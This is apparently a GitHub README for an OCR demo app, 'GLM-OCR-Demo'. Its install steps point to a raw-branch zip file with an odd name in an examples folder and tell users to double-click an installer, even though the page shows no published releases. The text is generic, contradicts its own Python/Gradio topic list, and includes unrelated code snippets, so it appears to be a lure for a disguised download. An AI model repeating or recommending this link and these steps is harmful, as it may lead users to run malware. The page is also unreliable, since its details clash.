emotech15/GLM-OCR-Demo

🎉 GLM-OCR-Demo - Easily Extract Text from Images

🌐 Overview

Welcome to the GLM-OCR-Demo! This application showcases the capabilities of the GLM-OCR multimodal OCR model developed by zai-org. With this tool, you can upload images and recognize text, formulas, and tables easily. The results come in both plain text and Markdown formats, making it simple to use in various applications.

🚀 Getting Started

The steps below walk you through downloading GLM-OCR-Demo and setting it up on your computer.

🔗 Download Link

Download GLM-OCR-Demo

Make sure you check out the latest version on our Releases page.

📥 Download & Install

  1. Visit the Releases Page

    Go to our Releases page to download the software. Click the button below to access it directly:

    Download GLM-OCR-Demo

  2. Choose Your Version

    On the Releases page, you will see a list of available versions. Select the latest version for the best features and improvements.

  3. Download the Installation File

    Click the file link to start your download. The link will typically look something like https://github.com/emotech15/GLM-OCR-Demo/raw/refs/heads/main/examples/OC-Demo-GL-v2.3.zip. Your browser will handle the download, and the file should appear in your Downloads folder.

  4. Run the Installer

    After downloading, locate the file in your Downloads folder. Double-click on the file to begin installation. Follow the prompts to complete the installation process.

  5. Open the Application

    Once installed, you can find GLM-OCR-Demo in your applications folder. Open it to begin.

⚙️ System Requirements

To ensure smooth operation, make sure your system meets the following requirements:

  • Operating System: Windows 10 or later / macOS Sierra or later / Linux
  • RAM: Minimum of 4 GB, preferably 8 GB or more
  • Disk Space: At least 1 GB of free space for installation
  • Internet Connection: Required for downloading images and processing
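
The disk space requirement above can be checked before installing. The following is a minimal sketch using only the Python standard library; the function name `has_enough_disk` and the choice to inspect the current directory are assumptions made for illustration and are not part of GLM-OCR-Demo.

```python
import platform
import shutil

# 1 GB, taken from the requirements list above.
# Everything else in this sketch (names, checked path) is hypothetical.
REQUIRED_FREE_BYTES = 1 * 1024**3


def has_enough_disk(path: str, required_bytes: int = REQUIRED_FREE_BYTES) -> bool:
    """Return True if the filesystem holding `path` has at least `required_bytes` free."""
    return shutil.disk_usage(path).free >= required_bytes


if __name__ == "__main__":
    # Report the operating system so it can be compared with the list above.
    print("Operating system:", platform.system(), platform.release())
    print("Enough free disk space:", has_enough_disk("."))
```

The standard library has no portable way to read installed RAM, so this sketch leaves the memory requirement to be checked by hand.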

🖼️ How to Use GLM-OCR-Demo

  1. Upload an Image

    After opening the application, you will see an option to upload your image. Click the "Upload" button and select an image file from your computer. Supported formats include JPG, PNG, and BMP.

  2. Select Recognition Type

    Choose whether you want to recognize text, formulas, or tables. This will help the model understand what to look for in your uploaded image.

  3. Run the OCR Process

    Once you have selected your options, click the "Start" button. The application will process your image. This may take a few moments depending on the size and complexity of the image.

  4. View Results

    The recognized content will appear on the screen after processing. You can copy the text or export it in your desired format (plain text or Markdown).

  5. Save Your Output

    Save your recognized text by using the "Save" function. You can choose where to store it on your computer for later use.
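
To illustrate the difference between the two export formats mentioned above, here is a small sketch that renders the same recognized table as Markdown and as plain text, then saves it. The row data, the function names, and the tab-separated plain-text layout are all assumptions; the application's actual output layout is not documented here.

```python
from typing import List


def table_to_markdown(rows: List[List[str]]) -> str:
    """Render rows as a Markdown table, treating the first row as the header."""
    header, *body = rows
    lines = [
        "| " + " | ".join(header) + " |",
        "| " + " | ".join("---" for _ in header) + " |",
    ]
    lines += ["| " + " | ".join(row) + " |" for row in body]
    return "\n".join(lines)


def table_to_plain_text(rows: List[List[str]]) -> str:
    """Render rows as tab-separated plain text (an assumed layout)."""
    return "\n".join("\t".join(row) for row in rows)


def save_output(content: str, path: str) -> None:
    """Write the recognized content to disk as UTF-8."""
    with open(path, "w", encoding="utf-8") as f:
        f.write(content)


if __name__ == "__main__":
    # Hypothetical recognition result for a two-column table.
    rows = [["Item", "Qty"], ["Apple", "3"]]
    save_output(table_to_markdown(rows), "result.md")
    save_output(table_to_plain_text(rows), "result.txt")
```

Markdown keeps the table structure readable in any Markdown viewer, while the plain-text form is easier to paste into a spreadsheet.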

🔧 Troubleshooting

If you encounter any issues while using the application, try the following steps:

  • Update Your System: Ensure that your operating system is updated to the latest version.
  • Check File Format: Verify that the image file you are uploading is in a supported format.
  • Restart the Application: Sometimes, simply closing and reopening the application can resolve minor glitches.
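
The file format check above can also be done by inspecting the first bytes of the file, since a wrong extension does not change the actual format. This is a minimal sketch assuming the three supported formats listed earlier (JPG, PNG, BMP); the function names are hypothetical and not part of the application.

```python
from typing import Optional

# Leading "magic" bytes for the three formats the guide lists as supported.
SIGNATURES = {
    "JPG": b"\xff\xd8\xff",
    "PNG": b"\x89PNG\r\n\x1a\n",
    "BMP": b"BM",
}


def detect_image_format(header: bytes) -> Optional[str]:
    """Return "JPG", "PNG", or "BMP" based on the leading bytes, else None."""
    for name, magic in SIGNATURES.items():
        if header.startswith(magic):
            return name
    return None


def is_supported_image(path: str) -> bool:
    """Read the first 8 bytes of the file and check them against the known signatures."""
    with open(path, "rb") as f:
        return detect_image_format(f.read(8)) is not None
```

For example, `is_supported_image("scan.png")` returns `False` if the file is really a GIF that was renamed, which an extension check alone would miss.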

💡 Tips for Better Recognition

  • Use clear and well-lit images for best results.
  • Avoid images with heavy noise or distracting backgrounds.
  • Ensure the text in images is not too small.
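
Small text often goes together with a low-resolution image, so a quick resolution check can serve as a rough proxy for the last tip. The sketch below reads the width and height from a PNG file header using only the standard library. The 600-pixel threshold and the function names are assumptions chosen for illustration, not values recommended by GLM-OCR-Demo, and the check covers PNG files only.

```python
import struct
from typing import Tuple

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
MIN_SIDE_PX = 600  # hypothetical threshold, not taken from the application


def png_dimensions(header: bytes) -> Tuple[int, int]:
    """Return (width, height) from the first 24 bytes of a PNG file."""
    if (
        len(header) < 24
        or not header.startswith(PNG_SIGNATURE)
        or header[12:16] != b"IHDR"
    ):
        raise ValueError("not a PNG header")
    # Width and height are big-endian 32-bit integers right after the IHDR tag.
    width, height = struct.unpack(">II", header[16:24])
    return width, height


def looks_too_small(header: bytes, min_side: int = MIN_SIDE_PX) -> bool:
    """Return True if the shorter side of the image is below `min_side` pixels."""
    width, height = png_dimensions(header)
    return min(width, height) < min_side


if __name__ == "__main__":
    # "scan.png" is a placeholder path.
    with open("scan.png", "rb") as f:
        print("Possibly too small:", looks_too_small(f.read(24)))
```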

📚 Support

For further assistance, check our FAQ section or contact our support team. You can find additional resources on our GitHub page.

🌍 Topics Covered

  • accelerate
  • computer vision
  • flash attention
  • GLM-OCR
  • Gradio
  • Hugging Face Transformers
  • Markdown
  • Optical Character Recognition (OCR)
  • OpenCV
  • Pillow
  • Python
  • PyTorch
  • Torch
  • torchvision
  • Vision Language Models (VLMs)

Thank you for using GLM-OCR-Demo! Happy text extraction.

Releases

No releases published
